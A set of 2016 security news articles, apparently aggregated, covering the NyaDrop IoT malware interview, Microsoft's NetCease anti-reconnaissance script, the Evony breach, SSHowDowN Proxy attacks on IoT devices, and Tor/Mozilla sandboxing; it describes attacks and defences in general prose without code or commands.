As MalwareMustDie reports in his research published yesterday on his blog, the new undetected malware NyaDrop, like the most IoT malware emerging today, relies on a kind of infection, which make use of an initial brute-force attack through which it tries to exploits the default credentials of the device. We have to remember that often the web-ip-cam, DVR/NVR, routers/modems are deployed without changing the default credentials.
Once the NyaDrop succeeded to connect – using Telnet protocol – to the IoT device infect the system dropping (downloading) in the guest host the real NyaDrop binary code: that’s why the size of NyaDrop initially is a small executable file.
Figure 1: strings contained in the binary code of NyaDrop
From the NyaDrop binary is not possible to extract too many strings except “nyABa” and from this the codename “Nya”. This string anyway is “a good way to grep for the easy filtration or one of the conditions in filtering this malware version for the mitigation purpose / signature.”
But let’s give a look to the binary code of the malware.
“If you see the size, we are dealing with a small executable file. It’s a clean libc compiled ELF from coded in C in such form that we see much in shellcodes. Insides are filled with the MIPS opcodes. We dealt before with the similar small ELF malware before in the following posts in here [link] and here [link], I will try to deal with this one too :)”
Figure 2: The NyaDrop ELF
Small size yes? But it is amazing to see what this small malicious ELF can do..
In the MalwareMustDie analysis, the experts confirms that NyaDrop then will try to connect from the infected device to the C&C host in order to download the Nya trojan if the IoT device uses “MIPS CPU architecture, implying routers and similar networking devices, with 32bit clock. “
MIPS-based CPUs are often found within devices such as routers, DVRs, CCTV cameras, and other embedded systems, as we mentioned above.
So we have here a very selective environment malware and this means that the NyaDrop author didn’t want to attack any IoT platform, but on the contrary, he wanted to avoid infecting “useless”device: to target the best devices with the most powerful bandwidth, and avoiding to “drop” on incompatible system the precious binary code that could be unable to be executed.
The interview of @unixfreaxjp from MalwareMustDie in exclusive for Security Affair about Linux/NyaDrop
But let’s go to the interview with MalwareMustDie.
Q: What makes the sighting of NyaDrop is so low, even maybe some seen the attacks/efforts to infect?
A: We can summarize those key points:
The actor really checks the target, he aims only desirable type of hardware and is not bother to infect upon environment that not match.
He makes sure to delete the “nya” upon an effort to inject need NyaDrop, so it is also not impossible after a new “nya” installed it will delete the NyaDrop too. That way no one knows or having a sample.
Many people ask for more samples, it is very hard to get the real worked one without getting cut in the middle of infection, lucky that I know many tricks in shells.
Q: Why do you think he is asking MIPS architecture in your case? How the herder made effort for the infection in that architecture?
A: I am not sure why, but obviously, next to ARM, MIPS devices are plenty on the internet, especially the networking boxes such as gateways, routers, switch, modems etc. He made hard effort, to make the binary as small as possible with a limited set of buffer size, you can see it in the reversing part I made. The total binary size is 621 bytes, with the complete functionalities using syscalls (socket, connect, recv, open, write, close), NyaDrop was designed as backdoor to be pwn tools of routers.
Q: How do you think the effectively in using Telnet to inject/install Nyandrop to the targeted machine?
A: It’s only if you know Telnet flaw of the device or hardcoded pwd then one are aiming this sector. In this season, we have about 2million device with Telnet running on the internet, the effectivity to aim this protocol to gain shell privilege is fairly high. The way the coder inject the binary using echo commands it’s not smart and can raise a risk to break some shell on handling those data, this is also why the successfully injected binary spotted is low.
Sorry, but I am not going to suggest the best way for do this.
Q: You mentioned it was originated in Russia, why?
A: Seeing the way it is coded & compiled, it is good, it trimmed the ELF into the minimum running state… it is very hard to imagine that skiddies that we know is having such knowledge.
I investigated deeper the source IP used, such connection will not be easily contracted by westerners.
Q: Do you think it is a new concept to infect IoT using the dropper/injector backdoor like Linux/NyaDrop?
A: For the malware, the concept is not new, for IoT it is new since IoT was never being aimed as hard as now also. But I see many types of socket connect()/back_connect() ELF dropped in server side plenty of time, during the Shellshock era we had tons of these, the concept is not new at all.
In fact, I know exactly what, where, and how to look when this type is starting to hit IoT.
About the Author: Odisseus
Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.
Security experts released an anti-reconnaissance tool dubbed NetCease
15.10.2016 securityaffairs Security
A Microsoft security duo released a new tool dubbed NetCease designed to make hard for attackers to conduct reconnaissance.
Microsoft experts have released a tool dubbed NetCease that was designed to make hard reconnaissance activities of hackers.
The NetCease tool was developed by two researchers of the Microsoft Advanced Threat Analytics (ATA) research team, Itai Grady and Tal Be’ery.
The security experts will present the tool at the Black Hat Europe where they will explore the concept of “offensive cyber defense” methods.
The application is not classified as an official Microsoft tool, but it has been made available on Microsoft’s TechNet Gallery under the default license terms for “Software on Documentation Portals.”
The reconnaissance is a critical phase of an attack, attackers gather information of the potential targets identified target machines, potential bridge components for lateral movements and privileged users.
Once the attacker has identified the targets, he can use the NetSessionEnum function to retrieve information about sessions established on domain controllers (DC) or other servers in the network.
A NetSessionEnum could allow attackers to discover device name, IP address, the username that established a session, and the duration of each session.
This data are essential for attackers to move laterally within their victim’s network.
Any domain user has the permission by default to execute the NetSessionEnum method remotely. Anyway, it is possible to harden the access to the NetSessionEnum method by manually editing a registry key. The NetCease is a PowerShell script that modifies this registry key modify to forbid the execution of the NetSessionEnum.
“Net Cease” tool is a short PowerShell (PS) script which alters Net Session Enumeration (NetSessionEnum) default permissions. This hardening process prevents attackers from easily getting some valuable recon information to move laterally within their victim’s network.” reads the NetCease description.
“The NetCease script hardens the access to the NetSessionEnum method by removing the execute permission for Authenticated Users group and adding permissions for interactive, service and batch logon sessions,” the experts explained. “This will allow any administrator, system operator and power user to remotely call this method, and any interactive/service/batch logon session to call it locally.”
NetCease is simple to use, administrators have to run the PowerShell script as administrator on the machine they need to harden (i.e. a Domain Controller), then restart it.
33 million records exposed after the Evony data breach
14.10.2016 securityaffairs Crime
The website and the forum of the Evony gaming company were hacked this summer and as a result 33 Million of its gamers have their data compromised.
Data of more than 33 million accounts of the Evony gaming company were stolen as result of a data breach occurred in June. Evony is the company that developed the popular game Evony: Age II, that is played by more of 18 Million gamers in over 167 countries. Hackers breached the website of Evony gaming firm accessing 33,407,472 records of registered user accounts.
Two months later, on August, the website was breached again, at that time hackers compromised the Evony forum exposing data of 938,000 registered accounts.
The data breach notification service LeakedSource obtained a copy of the huge archive and published a detailed analysis of the leaked data.
“Gaming company Evony was hacked for a total of 33,407,472 users from its main game database in June of 2016. Earlier this year in August we discovered their forums were also hacked for 938k users.” states a blog post published by the company.
“Each record contains a username, email address, password, and ip address among other internal data fields. Users can now get notified any time they appear in a breach. If your personal information appears in our copy of this database, or in any other leaked database that we possess, you may remove yourself for free.”
Each record includes username, email address, password, and IP address and other internal data. The password were stored in unsalted MD5 and SHA-1 (Secure Hash Algorithm 1), this means that for hackers it is quite easy to decrypt them.
“Passwords were stored using unsalted MD5 hashing which means at this point we have cracked most of them. Surprisingly they also stored the passwords in unsalted SHA1 next to the MD5 which makes no sense but anyway” continues the post.
123456 was the most used password on the gaming site, this is the demonstration that users are a low perception of cyber threats and lack of awareness on a proper security posture online.
A look to the top email domains reveal that @Yahoo.com was one of the most popular, followed by @hotmail.com.
At the time I was writing it is not clear is the Evony company has alerted its registered users.
12-Year-Old SSH Bug Exposes More than 2 Million IoT Devices
14.10.2016 thehackernews Vulnerebility
Are your internet-connected devices spying on you? Perhaps.
We already know that the Internet of Thing (IoT) devices are so badly insecure that hackers are adding them to their botnet network for launching Distributed Denial of Service (DDoS) attacks against target services.
But, these connected devices are not just limited to conduct DDoS attacks; they have far more potential to harm you.
New research [PDF] published by the content delivery network provider Akamai Technologies shows how unknown threat actors are using a 12-year-old vulnerability in OpenSSH to secretly gain control of millions of connected devices.
The hackers then turn, what researchers call, these "Internet of Unpatchable Things" into proxies for malicious traffic to attack internet-based targets and 'internet-facing' services, along with the internal networks that host them.
Unlike recent attacks via Mirai botnet, the new targeted attack, dubbed SSHowDowN Proxy, specifically makes use of IoT devices such as:
Internet-connected Network Attached Storage (NAS) devices.
CCTV, NVR, DVR devices (video surveillance).
Satellite antenna equipment.
Networking devices like routers, hotspots, WiMax, cable and ADSL modems.
Other devices could be susceptible as well.
More importantly, the SSHowDowN Proxy attack exploits over a decade old default configuration flaw (CVE-2004-1653) in OpenSSH that was initially discovered in 2004 and patched in early 2005. The flaw enables TCP forwarding and port bounces when a proxy is in use.
However, after analyzing IP addresses from its Cloud Security Intelligence platform, Akamai estimates that over 2 Million IoT and networking devices have been compromised by SSHowDowN type attacks.
Due to lax credential security, hackers can compromise IoT devices and then use them to mount attacks "against a multitude of Internet targets and Internet-facing services, like HTTP, SMTP and network scanning," and to mount attacks against internal networks that host these connected devices.
Once hackers access the web administration console of vulnerable devices, it is possible for them to compromise the device's data and, in some cases, fully take over the affected machine.
While the flaw itself is not so critical, the company says the continual failure of vendors to secure IoT devices as well as implementing default and hard-coded credentials has made the door wide open for hackers to exploit them.
"We are entering a very interesting time when it comes to DDoS and other web attacks; 'The Internet of Unpatchable Things' so to speak," said Eric Kobrin, senior director of Akamai's Threat Research team.
"New devices are being shipped from the factory not only with this vulnerability exposed but also without any effective way to fix it. We've been hearing for years that it was theoretically possible for IoT devices to attack. That, unfortunately, has now become the reality."
According to the company, at least 11 of Akamai's customers in industries such as financial services, retail, hospitality, and gaming have been targets of SSHowDowN Proxy attack.
The company is "currently working with the most prevalent device vendors on a proposed plan of mitigation."
How to Mitigate Such Attacks?
So, if you own a connected coffee machine, thermostat or any IoT device, you can protect yourself by changing the factory default credentials of your device as soon as you activate it, as well as disabling SSH services on the device if it is not required.
More technical users can establish inbound firewall rules that prevent SSH access to and from external forces.
Meanwhile, vendors of internet-connected devices are recommended to:
Avoid shipping such products with undocumented accounts.
Force their customers to change the factory default credentials after device installation.
Restrict TCP forwarding.
Allow users to update the SSH configuration to mitigate such flaws.
Since IoT devices number has now reached in the tens of billions, it’s time to protect these devices before hackers cause a disastrous situation.
Non-profit organizations like MITRE has come forward to help protect IoT devices by challenging researchers to come up with new, non-traditional approaches for detecting rogue IoT devices on a network. The company is also offering up to $50,000 prize money.
Here’s how Tor Project and Mozilla will make harder de-anonymizing Tor users
14.10.2016 securityaffairs Security
Tor Project and Mozilla are working together to improve the security of Tor users and make harder for attackers to unmask them.
Intelligence and law enforcement agencies continue to invest in order to de-anonymize Tor users. In the past, we received news about several techniques devised by various agencies to track Tor users, from the correlation attacks to the hack of a machine with the NIT script.
In many cases, authorities and cyber spies targeted individual users’ computers for this reason the experts the Tor Project alongside with the experts from Mozilla’s Firefox involved in the project are working on a series of improvements to make harder the exploitation of flaws in the browser component of the Tor architecture.
The improvements aim to block malware from trying to gather information to unmask users.
Tor Project
“We’re at the stage right now where we have created the basic tools and we’re working on putting them together to realize the security benefits,” Richard Barnes, Firefox Security Lead, told Joseph Cox from Motherboard via email.
The Tor Browser is composed of two components, a modified version of the Firefox browser, and the Tor proxy which implements routing functionalities in the Tor network. An attacker can try to hack the browser component forcing it to connect to other than the legitimate Tor proxy part, for example, a server set up by the attacker that gathers user data.
“That means if an attacker can compromise the Firefox half of Tor Browser, it can de-anonymize the user by connecting to something other than the Tor proxy,” Barnes said.
Barnes a series of improvements, including the use of Unix domain sockets that are data communications endpoints for exchanging data between processes executing on the same operating system.
This will allow the Tor Browser to securely communicate with the FireFox component without underlying the network protocol. In this was the experts will sandbox the Firefox component, any manipulation or attacks will have no effects on the user’s privacy because the Tor Browser wouldn’t be able to make a network connection to de-anonymize the user.
Basically the intent of the experts at the Tor Project is to sandbox the Tor browser to insulate our users from attacks such as the NIT and similar ones. According to Motherboard, the Tor developer Yawning Angel just finished an experimental prototype that will likely appear in some versions of the Tor Browser later this year.
“That means that you could run it in a sandbox with no network access (only a Unix domain socket to the proxy), and it would still work fine. And then, even if the Firefox half of Tor Browser were compromised, it wouldn’t be able to make a network connection to de-anonymize the user,” added Barnes.
As explained by Barnes such kind of security measures is actually supported only on platforms that have implement Unix domain sockets, such as Linux and Mac OS.
The experts are now working to extend it to Windows platforms.